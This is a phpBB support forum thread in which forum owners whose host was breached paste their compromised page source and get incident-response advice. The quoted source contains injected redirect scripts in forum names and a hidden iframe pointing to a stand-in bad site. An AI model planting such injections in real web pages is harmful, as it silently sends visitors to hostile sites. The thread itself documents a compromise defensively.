Forum hacked, please help...

Get help with installation and running phpBB 3.0.x here. Please do not post bug reports, feature requests, or MOD-related questions here.
Ideas Centre
Forum rules
END OF SUPPORT: 1 January 2017 (announcement)
Locked
izmas
Registered User
Posts: 1
Joined: Thu Jan 22, 2009 6:31 am

Forum hacked, please help...

Post by izmas »

Hi,

My forum was hacked on Sunday. I was sure it was an attack on my host (cookiehost) because another website that was hosted on there got hijacked and my forum was automatically redirecting to the hacked website. I would like to share some code from my index.php and was wondering how I can get rid of the redirecting script. I have already alerted my host back on Sunday, but they have yet to reply.

I was able to stop the redirection in the browser and able to pull up the source. I haven't been able to locate the problems in the php files on my server, but located the script inside this source. Thanks to all in advance for your help...
<tr>
<td class="cat" colspan="2"><h4><a href="./viewforum.php?f=1"><script>location.href="http://tbsafety.com/"</script></a></h4></td>
<td class="catdiv" colspan="3">&nbsp;</td>
</tr>
This script is throughout my index.php file...and keeps going on and on.
tr>
<td class="row1" width="50" align="center"><img src="./styles/subsilver2/imageset/forum_read.gif" width="46" height="25" alt="No new posts" title="No new posts" /></td>
<td class="row1" width="100%">
<div style="float: left; margin-right: 5px;"><img src=".//images/pug-hat.gif" alt="No new posts" /></div><div style="float: left;">

<a class="forumlink" href="./viewforum.php?f=2"><script>location.href="http://tbsafety.com/"</script></a>
<p class="forumdesc">Welcome new members. Please come in and introduce yourself!</p>
</div> </td>
<td class="row2" align="center"><p class="topicdetails">3</p></td>
<td class="row2" align="center"><p class="topicdetails">5</p></td>
<td class="row2" align="center" nowrap="nowrap">

<p class="topicdetails">Fri Sep 26, 2008 5:09 pm</p>
<p class="topicdetails"><a href="./memberlist.php?mode=viewprofile&u=53">Mr.Pig</a> <a href="./viewtopic.php?f=2&p=31#p31"><img src="./styles/subsilver2/imageset/icon_topic_latest.gif" width="18" height="9" alt="View the latest post" title="View the latest post" /></a>
</p>
</td>
</tr>
<tr>
<td class="row1" width="50" align="center"><img src="./styles/subsilver2/imageset/forum_read.gif" width="46" height="25" alt="No new posts" title="No new posts" /></td>

<td class="row1" width="100%">
<div style="float: left; margin-right: 5px;"><img src=".//images/pug-hat.gif" alt="No new posts" /></div><div style="float: left;">
<a class="forumlink" href="./viewforum.php?f=3"><script>location.href="http://tbsafety.com/"</script></a>
<p class="forumdesc">Everything pug related can go here. This is our main forum.</p>
</div> </td>


User avatar
Noxwizard
Support Team Leader
Support Team Leader
Posts: 10373
Joined: Mon Jun 27, 2005 8:41 pm
Location: Texas, USA
Name: Patrick Webster
Contact:

Re: Forum hacked, please help...

Post by Noxwizard »

Please do the following:
My board has been hacked, what do I do? wrote:Please do the following before making any modifications to your board (this includes changing passwords, editing files, running the admin toolkit, etc.):
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
4) File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board, the proper place for incidents reports is the tracker.[/list]
It looks like the forum names have been replaced.
[Support Template] - [Read Before Posting] - [phpBB Knowledge Base]
Do not contact me for private support, please share the question in our forums.

ericmoon
Registered User
Posts: 1
Joined: Thu Jan 22, 2009 2:28 pm

Re: Forum hacked, please help...

Post by ericmoon »

It appears cookiehost is having a problem with security. Last night over 100 hosted sites (including 2 of mine) were defaced. I have alerted cookiehost and am waiting for a response... if I don't get a satisfactory response, I'll be switching hosts asap.

User avatar
CTCNetwork
Former Team Member
Posts: 15424
Joined: Fri Dec 19, 2003 3:50 am
Location: In that Volvo behind you!
Contact:

Re: Forum hacked, please help...

Post by CTCNetwork »

Hi,

Bit late on this but in which file is the class forumdesc to be found and set?

My host also suffered a recent attack and I now find (but only several days after the initial attack) that some files were edited/changed.
Mostly the index.htm files within folders. However the following was also added on the index page on a link back to the site main page:

Code: Select all

 <tr> 
                     <td class="row1" width="31" align="center"><img src="./styles/hestia_blue/imageset/forum_link.gif" width="25" height="27" alt="No new posts" title="No new posts" /></td> 
                     <td class="row1"> 
  
                                                   <a class="forumlink" href="./viewforum.php?f=57">RWD Volvos</a> 
                          <p class="forumdesc">Link back to the RWD Volvos home page.<iframe src=http://badsite.blah style=display:none></iframe></p> 
Des. . . ;)

Edit: Looks like the link was injected into the DB. Removal of the link back and re-creating it has removed the iframe and rest of the injected code.
Density:- Not just a measurement~Its a whole way of Life.! ! !
| Welcome! | RTFM!!! | Search! It's Easy! | Problem? | Spam? | Advice! |

Locked

Return to “[3.0.x] Support Forum”